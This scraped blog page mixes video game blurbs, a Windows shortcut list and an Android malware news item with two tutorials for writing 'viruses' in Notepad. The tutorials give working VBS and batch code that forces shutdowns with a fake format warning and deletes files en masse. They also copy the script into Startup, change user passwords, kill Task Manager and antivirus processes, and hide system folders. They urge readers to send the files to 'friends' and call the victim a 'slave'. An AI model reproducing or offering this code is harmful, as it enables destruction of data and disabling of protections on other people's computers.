Grand Theft Auto V (Best Game played Ever)

Grand Theft Auto V is an open world action-adventure video game developed by Rockstar North and published by Rockstar Games. The game was released on 17 September 2013 for the PlayStation 3 and Xbox 360, on 18 November 2014 for the PlayStation 4 and Xbox One, and on 14 April 2015 for Microsoft Windows

God Of War IV (Best Thrilling Game)

God of War IV is an upcoming third-person action-adventure video game in development by Santa Monica Studio and to be published by Sony Interactive Entertainment (SIE) for the PlayStation 4 (PS4) console. It will be the eighth installment in the God of War series, the eighth chronologically, and the sequel to 2010's God of War III.

Spec Ops: The Line (Best Shooting Game Ever)

Spec Ops: The Line is a 2012 third-person shooter video game developed by the German studio Yager Development and published by 2K Games. It was released internationally in June 2012 for Microsoft Windows, Xbox 360 and PlayStation 3. It was later released for OS X in 2013 and Linux in 2015. It is the tenth title, as well as a reboot, of the Spec Ops series, and the first entry since Spec Ops: Airborne Commando in 2002. The game is powered by Unreal Engine 3.

FIFA 17

FIFA 17 is an association football video game in the FIFA series, released on 27 September 2016 in North America and 29 September 2016 for the rest of the world. This is the first FIFA game in the series to use the Frostbite game engine.[2] On 21 July 2016, it was announced that, after a public vote, Marco Reus would feature on the cover of the game.[3] The demo was released on 13 September 2016. The Play First Trial was released on 22 September 2016 in Microsoft Windows's Origin Access and Xbox One's EA Access.

Need for Speed 2015 (Most Played video game)

Need for Speed is an online open world racing video game developed by Ghost Games and published by Electronic Arts, released for PlayStation 4 and Xbox One in November 2015, and released on Origin for Microsoft Windows on March 15, 2016. It is the twenty-second installment in the long-running Need for Speed series, and is a full reboot of the franchise.

Tom Clancy's Splinter Cell Black List (The Owsome Mystrey Game)

Tom Clancy's Splinter Cell is a series of award-winning stealth video games, the first of which was released in 2002, and their tie-in novels. The protagonist, Sam Fisher, is a highly trained agent of a fictional black-ops sub-division within the NSA, dubbed "Third Echelon". The player controls Fisher to overcome his adversaries in levels (created using Unreal Engine) that were extended to emphasise light and darkness as gameplay elements. All the console and PC games in the series were critically acclaimed, and the series is commercially successful. The series, along with Assassin's Creed, is considered to be one of Ubisoft's flagship franchises,selling more than 31 million copies as of 2011.

Wednesday, January 25, 2017

HOW TO CREATE FUNNY VIRUS USING NOTEPAD?

How to Create Funny Virus using Notepad?

A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also used to refer to other types of malware and programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when it's host is taken to the target computer.


Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.

Do you know that we can make simple viruses by using Notepad? Notepad is a simple but very powerful tool to make viruses. Let us show you some viruses (developed on notepad).

1. Continuously pop out CD or DVD Drive:
Open Notepad and Type the following code:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as abc.vbs. After saving just double click on the file to execute the file. You can also send the file to your friends and ask them to open it.

2. Type any message in notepad automatically and scare your friends:
Open Notepad and Type the following code :

WScript.Sleep 1800
WScript.Sleep 1000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m T"
WScript.Sleep 500
WshShell.SendKeys "alha"
WScript.Sleep 500
WshShell.SendKeys " cha"
WScript.Sleep 500
WshShell.SendKeys "udh"
WScript.Sleep 500
WshShell.SendKeys "ary!"
WScript.Sleep 500
WshShell.SendKeys " yo"
WScript.Sleep 500
WshShell.SendKeys "u ar"
WScript.Sleep 500
WshShell.SendKeys "e bi"
WScript.Sleep 500
WshShell.SendKeys "eng"
WScript.Sleep 500
WshShell.SendKeys " hac"
WScript.Sleep 500
WshShell.SendKeys "ked!"
WScript.Sleep 500
WshShell.SendKeys "ha "
WScript.Sleep 500
WshShell.SendKeys " ha "
WScript.Sleep 500
WshShell.SendKeys " ha "

Save it as abc.vbs. After saving just double click on the file to execute the file. You can also send the file to your friends and ask them to open it.

3. Show a error message and shut down friends computer:

Open Notepad and Type the following code :

@echo off
msg * I don't like you
shutdown -c "Error! C drive formatting in process..." -s

You can change the message by replacing the text in your message.

Save it as abc.bat. After saving just double click on the file to execute the file. You can also send the file to your friends and ask them to open it.

--
You may be more creative and prepare more interesting viruses using Notepad only.



MORE THAN 1 MILLION ANDROID DEVICES INFECTED BY MALICIOUS APP

More than 1 Million Android Devices infected by malicious app




How Cowboy Adventure victimizes Android users?


Once installed, Cowboy Adventure produced a fake Facebook login window that prompted users to enter their Facebook usernames along with their passwords. A practice known as OAuth in which a 3rd party asks your Facebook login.

However, if users provide their credentials to Cowboy Adventure app, the malicious code within the game app allegedly sent their credentials to the attacker's server.
Therefore, If you have downloaded Cowboy Adventure or Jump Chess, you should immediately change not alone your Facebook password, but any service that uses the same combination of username and password as your Facebook account.

ESET senior security researcher Robert Lipovsky believes that the app malicious behavior is not just a careless mistake of the game developer, but the developer is actually a criminal minded.

Take Away


A few basic tips that you should always keep in your mind are:
  • Always download apps from official sources, such as Google Play Store or Apple's App Store.
  • Read reviews from other users before downloading an app (Many users complained about "Cowboy Adventure" that the game locked them out of Facebook accounts).
  • Always use two-factor authentication on services that makes it harder for hackers to access your accounts with just your password.
  • Always keep a malware scanning software from trusted vendors like Avast, AVG, ESET, Kaspersky and Bitdefender, on your smartphone.
                                                 

KEYBOARD SHORTCUT KEYS IN WINDOWS (100 SHORTCUTS)

More than 100 Keyboard Shortcuts must read & Share

Keyboard Shortcuts (Microsoft Windows)


1. CTRL+C (Copy)
2. CTRL+X (Cut)
... 3. CTRL+V (Paste)
4. CTRL+Z (Undo)
5. DELETE (Delete)
6. SHIFT+DELETE (Delete the selected item permanently without placing the item in the     Recycle Bin)
7. CTRL while dragging an item (Copy the selected item)
8. CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
9. F2 key (Rename the selected item)
10. CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
11. CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
12. CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
13. CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
14. CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
15. CTRL+A (Select all)
16. F3 key (Search for a file or a folder)
17. ALT+ENTER (View the properties for the selected item)
18. ALT+F4 (Close the active item, or quit the active program)
19. ALT+ENTER (Display the properties of the selected object)
20. ALT+SPACEBAR (Open the shortcut menu for the active window)
21. CTRL+F4 (Close the active document in programs that enable you to have multiple documents opensimultaneously)
22. ALT+TAB (Switch between the open items)
23. ALT+ESC (Cycle through items in the order that they had been opened)
24. F6 key (Cycle through the screen elements in a window or on the desktop)
25. F4 key (Display the Address bar list in My Computer or Windows Explorer)
26. SHIFT+F10 (Display the shortcut menu for the selected item)
27. ALT+SPACEBAR (Display the System menu for the active window)
28. CTRL+ESC (Display the Start menu)
29. ALT+Underlined letter in a menu name (Display the corresponding menu) Underlined letter in a command name on an open menu (Perform the corresponding command)
30. F10 key (Activate the menu bar in the active program)
31. RIGHT ARROW (Open the next menu to the right, or open a submenu)
32. LEFT ARROW (Open the next menu to the left, or close a submenu)
33. F5 key (Update the active window)
34. BACKSPACE (View the folder onelevel up in My Computer or Windows Explorer)
35. ESC (Cancel the current task)
36. SHIFT when you insert a CD-ROMinto the CD-ROM drive (Prevent the CD-ROM from automatically playing)

Dialog Box - Keyboard Shortcuts


1. CTRL+TAB (Move forward through the tabs)
2. CTRL+SHIFT+TAB (Move backward through the tabs)
3. TAB (Move forward through the options)
4. SHIFT+TAB (Move backward through the options)
5. ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
6. ENTER (Perform the command for the active option or button)
7. SPACEBAR (Select or clear the check box if the active option is a check box)
8. Arrow keys (Select a button if the active option is a group of option buttons)
9. F1 key (Display Help)
10. F4 key (Display the items in the active list)
11. BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)





Microsoft Natural Keyboard Shortcuts


1. Windows Logo (Display or hide the Start menu)
2. Windows Logo+BREAK (Display the System Properties dialog box)
3. Windows Logo+D (Display the desktop)
4. Windows Logo+M (Minimize all of the windows)
5. Windows Logo+SHIFT+M (Restorethe minimized windows)
6. Windows Logo+E (Open My Computer)
7. Windows Logo+F (Search for a file or a folder)
8. CTRL+Windows Logo+F (Search for computers)
9. Windows Logo+F1 (Display Windows Help)
10. Windows Logo+ L (Lock the keyboard)
11. Windows Logo+R (Open the Run dialog box)
12. Windows Logo+U (Open Utility Manager)
13. Accessibility Keyboard Shortcuts
14. Right SHIFT for eight seconds (Switch FilterKeys either on or off)
15. Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
16. Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
17. SHIFT five times (Switch the StickyKeys either on or off)
18. NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
19. Windows Logo +U (Open Utility Manager)
20. Windows Explorer Keyboard Shortcuts
21. END (Display the bottom of the active window)
22. HOME (Display the top of the active window)
23. NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
24. NUM LOCK+Plus sign (+) (Display the contents of the selected folder)

MMC Console keyboard shortcuts

1. SHIFT+F10 (Display the Action shortcut menu for the selected item)
2. F1 key (Open the Help topic, if any, for the selected item)
3. F5 key (Update the content of all console windows)
4. CTRL+F10 (Maximize the active console window)
5. CTRL+F5 (Restore the active console window)
6. ALT+ENTER (Display the Properties dialog box, if any, for theselected item)
7. F2 key (Rename the selected item)
8. CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)

Remote Desktop Connection Navigation


1. CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
2. ALT+PAGE UP (Switch between programs from left to right)
3. ALT+PAGE DOWN (Switch between programs from right to left)
4. ALT+INSERT (Cycle through the programs in most recently used order)
5. ALT+HOME (Display the Start menu)
6. CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
7. ALT+DELETE (Display the Windows menu)
8. CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
9. CTRL+ALT+Plus sign (+) (Place asnapshot of the entire client window area on the Terminal server clipboardand provide the same functionality aspressing ALT+PRINT SCREEN on a local computer.)

Microsoft Internet Explorer Keyboard Shortcuts


1. CTRL+B (Open the Organize Favorites dialog box)
2. CTRL+E (Open the Search bar)
3. CTRL+F (Start the Find utility)
4. CTRL+H (Open the History bar)
5. CTRL+I (Open the Favorites bar)
6. CTRL+L (Open the Open dialog box)
7. CTRL+N (Start another instance of the browser with the same Web address)
8. CTRL+O (Open the Open dialog box,the same as CTRL+L)
9. CTRL+P (Open the Print dialog box)
10. CTRL+R (Update the current Web page)
11. CTRL+W (Close the current window)  


                            

HOW TO MAKE A SIMPLE BATCH VIRUS

How To Make A Simple Batch Virus

Some KeyWords you should know: 

%SystemRoot%/%WinDir% = Windows Directory

%SystemRoot%/%UserProfile% = Users -OR- Documents and Settings

%SystemRoot%/%ProgramFiles% = ProgramFiles Directory /**NOT PROGRAM FILES (X86) DIRECTORY **\

%SystemRoot%/%UserProfile%/%AppData% = AppData -OR- ApplicationData

A. How To Copy Random Useless Files To slave's Computer to Fill his/her HD:
You can add this to your Code which copies this file into many locations you choose:

Always Put Quotes and Replace EXT with any Extension You Likecopy %0 "%SystemRoot%\%random%.%random%"

B. How To Block Websites:

Blocking websites does not allow the User to enter or connect to their Server, and this checks Hosts File in your C:/WINDOWS/System32/Drivers/ETC/ Folder.

So, if we put a code like:

cmd /c echo 127.0.0.1http://www.youtube.com/>>%SystemRoot%\%WinDir%\system32\Drivers\Etc\Hosts

It will block YouTube.com

C. How To Open Sites
Opening sites from a BatWch Shell is very easy.
start IEXPLORE SITEReplace SITE with any site you like

D. How To Delete Files With a Specific Extension:

This code is what I call "Search'n'Destroy". It Searches slave's computer for a specific extension and deletes every file it finds with that extension.

IF EXIST *.EXT (

del *.*

) ELSE (

echo Error

)
Replace EXT with any Extension

E. How To Copy Your Virus Into Registry/Startup:

Copying your Virus to StartUp will make slave's Computer Useless, depending on what Virus you made.

xcopy *.EXT "%userprofile%\Start Menu\Programs\Startup"
Replace EXT with these Extensions { EXE , BAT , CMD }, other extensions won't work.

F. How To Change User's Password and Date

Changing User's Password makes it more difficult for the slave to do anything in their computer. Changing Date can cause MSN Errors.

net user USERNAME PASSWORD*

set date=1

reg.exe add "%date%" /f >nul

G. How To Make it a Loop

Making a Loop will cause your Virus to Continue Working Again and Again from the Start-To-End using Labels.

Put this on top of your batch after @ECHO OFF:

:start

And this to the End of the Code:

GOTO :start
(You can change the word START with anything) /**DO NOT FORGET THE : SIGN**\

H. How To Kill Antivirus/Task Manager

Killing TaskManager and AntiVirus makes the Computer 90-98% USELESS.

/F Forces the termination of all processes/IM imagename Specifies the image name of the process that has to be terminated. Wildcard '*' can be used to specify all image names. Not used if PID is given in the command:

taskkill /F /IM Taskmgr.exe

-OR-

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul

Replace Taskmgr.exe with any Program's Name, Do this for AntiVirus Programs ,too.

For Multiple Programs Use:

taskkill /F /IM egui.exe /IM avg.exe

This will stop EsetNOD32 and AVG AntiViruses

I. How To Hide Important Files

Hiding Important Files such us Windows Folder, Program Files Folders etc. It will work for someone who does not know how to use the Computer very well.

attrib +h FOLDER OR FILE

Replace FOLDER OR FILE with anything that exists

J. How To Change/Switch Mouse Buttons

Changing Mouse Buttons will COMPLETELY Comnfude the slave

Rundll32 user32,SwapMouseButton